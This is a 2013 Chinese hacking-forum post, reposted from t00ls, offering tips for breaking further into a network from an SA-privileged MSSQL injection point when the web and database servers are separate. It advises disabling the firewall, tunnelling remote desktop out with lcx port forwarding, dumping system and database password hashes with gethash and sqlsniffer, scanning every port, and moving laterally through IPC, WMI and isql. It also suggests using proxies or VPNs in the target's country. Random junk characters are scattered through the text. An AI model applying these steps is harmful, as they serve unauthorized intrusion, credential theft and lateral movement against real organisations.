找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2131|回复: 0
打印 上一主题 下一主题

SA权限网站和数据库分离的一些思路

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:46:01 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。/ R0 k1 a9 w/ t- ~- w

! k5 W$ m& m* m& s$ A# q  |9 l7 w7 j+ x! K4 N, F# i% X# b3 n

. e% a& \+ U  jSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)5 k# t6 P; r  B* ]4 G
8 P5 V7 ]9 B0 |' V( p. S5 M$ }
; K0 A+ A7 x+ D$ i* [2 g0 m( F3 o
一、DB机有公网IP.6 d* F1 u' v% r; g/ s
( L6 W' I7 D1 Z- G1 Y6 v
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接." v5 q  ~$ j. w1 u. c& I& e: q
5 Q9 U) j3 T" k: q4 H; d
, U* N# z9 P# X( l! ]
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
0 n0 Z: Q% y; Z, i& r+ q1 w' |1 H2 A+ b; g; O: ^8 M

1 g* s. q' H$ Z3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com6 I$ |8 _5 m/ c, V  b* E

* ]3 Q  y7 y, f( _# G: e  W2 r# C( c
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.; P5 k3 O! g5 z0 g' f) B

  `* }7 }5 y7 u+ e! K5 v3 C+ C- v$ k7 ^( }: A  k8 G1 d* B0 B

$ n, x- t0 @" N0 s二、DB机只有内网IP
. f& a$ K- R. b/ w6 H
0 p: E# G0 `# C1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
' }8 ?" h0 @8 d- M4 l6 @& ?
+ C* e$ a' \; d3 K* f. Z
) }# I2 S: J. }7 J! J' V( M2:停掉防火墙和IP策略再从内往外扫描.
; U! A. ]: y( i+ v4 \) Z4 ~
+ u. @5 d7 j9 R; }
. C! _( N4 Q% X  ]8 }0 z9 L3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
5 N2 X5 U& U* z# o* |. o" v0 j0 p  X, G$ X# `% A9 \, h9 \3 {
# }2 \! X1 I7 K( G  {- y0 m
4:学会密码规律分析往往会有惊喜.- p4 R- S9 d; n0 L0 U

# `9 X7 e3 A- H! t, l% s. I; x
7 F! M8 S- D* G3 |! H: K! I5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等: }% p& _7 e. m& P9 O4 Q0 n

, U& i  }$ A/ Q/ x# C
1 r/ z* p) u) l有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表